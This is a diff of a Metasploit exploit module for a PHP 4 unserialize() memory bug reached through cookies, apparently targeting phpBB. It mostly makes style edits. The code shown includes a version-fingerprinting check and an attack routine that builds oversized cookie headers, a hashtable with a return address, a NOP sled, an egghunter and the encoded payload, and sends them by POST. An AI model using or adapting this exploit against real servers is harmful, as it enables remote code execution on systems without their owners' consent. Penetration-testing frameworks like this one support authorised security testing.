@@ -44,9 +44,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Privileged' => false,
         'Payload' => {
-          'Space' => 1024,
+          'Space' => 1024
         },
-        'Platform' => %w{linux},
         'Targets' => [
 
           #
@@ -207,14 +206,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('URI', [false, "The path to vulnerable PHP script"]),
-        OptString.new('COOKIENAME', [false, "The name of the cookie passed to unserialize()"])
+        OptString.new('URI', [false, 'The path to vulnerable PHP script']),
+        OptString.new('COOKIENAME', [false, 'The name of the cookie passed to unserialize()'])
       ]
     )
   end
 
   def check
-    vprint_status("Checking for a vulnerable PHP version...")
+    vprint_status('Checking for a vulnerable PHP version...')
 
     #
     # Pick the URI and Cookie name
@@ -222,12 +221,12 @@ class MetasploitModule < Msf::Exploit::Remote
     cookie_name = datastore['COOKIENAME'] || target['DefaultCookie']
     uri_path = normalize_uri(datastore['URI']) || target['DefaultURI']
 
-    if (not cookie_name)
-      fail_with(Failure::Unknown, "The COOKIENAME option must be set")
+    if (!cookie_name)
+      fail_with(Failure::Unknown, 'The COOKIENAME option must be set')
     end
 
-    if (not uri_path)
-      fail_with(Failure::Unknown, "The URI option must be set")
+    if (!uri_path)
+      fail_with(Failure::Unknown, 'The URI option must be set')
     end
 
     res = send_request_cgi({
@@ -237,12 +236,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     php_bug = false
 
-    if (not res)
-      vprint_status("No response from the server")
+    if (!res)
+      vprint_status('No response from the server')
       return Exploit::CheckCode::Unknown # User should try again
     end
 
-    http_fingerprint({ :response => res }) # check method
+    http_fingerprint({ response: res }) # check method
 
     if (res.code != 200)
       vprint_status("The server returned #{res.code} #{res.message}")
@@ -250,11 +249,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if (
-        (res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /PHP\/(.*)/) or
-        (res.headers['Server'] and res.headers['Server'] =~ /PHP\/(.*)/)
+        (res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ %r{PHP/(.*)}) or
+        (res.headers['Server'] and res.headers['Server'] =~ %r{PHP/(.*)})
       )
 
-      php_raw = $1
+      php_raw = ::Regexp.last_match(1)
       php_ver = php_raw.split('.')
 
       if (php_ver[0].to_i == 4 and php_ver[1] and php_ver[2] and php_ver[1].to_i < 5)
@@ -268,7 +267,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Detect the phpBB cookie name
     if res.get_cookies =~ /(.*)_(sid|data)=/
-      vprint_status("The server may require a cookie name of '#{$1}_data'")
+      vprint_status("The server may require a cookie name of '#{::Regexp.last_match(1)}_data'")
     end
 
     if (target and target['Signature'])
@@ -323,19 +322,19 @@ class MetasploitModule < Msf::Exploit::Remote
     cookie_name = datastore['COOKIENAME'] || target['DefaultCookie']
     uri_path = normalize_uri(datastore['URI']) || target['DefaultURI']
 
-    if (not cookie_name)
-      fail_with(Failure::Unknown, "The COOKIENAME option must be set")
+    if (!cookie_name)
+      fail_with(Failure::Unknown, 'The COOKIENAME option must be set')
     end
 
-    if (not uri_path)
-      fail_with(Failure::Unknown, "The URI option must be set")
+    if (!uri_path)
+      fail_with(Failure::Unknown, 'The URI option must be set')
     end
 
     # Generate and reuse the original buffer to save CPU
-    if (not @saved_cookies)
+    if (!@saved_cookies)
 
       # Building the malicious request
-      print_status("Creating the request...")
+      print_status('Creating the request...')
 
       # Create the first cookie header to get this started
       cookie_fun = "Cookie: #{cookie_name}="
@@ -363,11 +362,11 @@ class MetasploitModule < Msf::Exploit::Remote
       # Keep adding cookie headers...
       while (refcnt < refmax)
 
-        chead = 'Cookie: ';
+        chead = 'Cookie: '
         chead << encode_semis('";N;')
 
         # Stay within the 8192 byte limit
-        0.upto(679) do |i|
+        0.upto(679) do |_i|
           break if refcnt >= refmax
 
           refcnt += 1
@@ -379,7 +378,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       # The final header, including the hashtable with return address
-      cookie_fun << "Cookie: "
+      cookie_fun << 'Cookie: '
       cookie_fun << Rex::Text.uri_encode('";N;')
       cookie_fun << zvalref * 500
 
@@ -387,7 +386,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Generate and reuse the payload to save CPU time
-    if (not @saved_payload)
+    if (!@saved_payload)
       @saved_payload = ((tagger + tagger + make_nops(8192) + payload.encoded) * 256)
     end
 
@@ -395,7 +394,7 @@ class MetasploitModule < Msf::Exploit::Remote
       's:39:"' + egghunter + '";s:39:"' + hashtable + '";i:0;R:3;'
     ) + "\r\n"
 
-    print_status("Trying address 0x%.8x..." % target_addrs['Ret'])
+    print_status('Trying address 0x%.8x...' % target_addrs['Ret'])
     res = send_request_cgi({
       'uri'	=> uri_path,
       'method'	=> 'POST',
@@ -409,31 +408,31 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Received a response: #{res.code} #{res.message}")
 
       if (res.code != 200)
-        print_error("The server returned a non-200 response, indicating that the exploit failed")
+        print_error('The server returned a non-200 response, indicating that the exploit failed')
         failed = true
       end
 
-      if (not failed and (res.body and res.body.length > 0))
-        print_error("The server returned a real response, indicating that the exploit failed")
+      if (!failed and (res.body and res.body.length > 0))
+        print_error('The server returned a real response, indicating that the exploit failed')
         failed = true
       end
 
       if (failed)
-        print_status("Please verify the URI and COOKIENAME parameters.")
+        print_status('Please verify the URI and COOKIENAME parameters.')
         print_line('')
-        print_line("*" * 40)
+        print_line('*' * 40)
         print_line(res.body)
-        print_line("*" * 40)
+        print_line('*' * 40)
         print_line('')
 
-        fail_with(Failure::Unknown, "Exploit settings are probably wrong")
+        fail_with(Failure::Unknown, 'Exploit settings are probably wrong')
       end
     else
-      print_status("No response from the server")
+      print_status('No response from the server')
     end
   end
 
   def encode_semis(str)
-    str.gsub(';') { |s| sprintf("%%%.2x", s[0]) }
+    str.gsub(';') { |s| sprintf('%%%.2x', s[0]) }
   end
 end
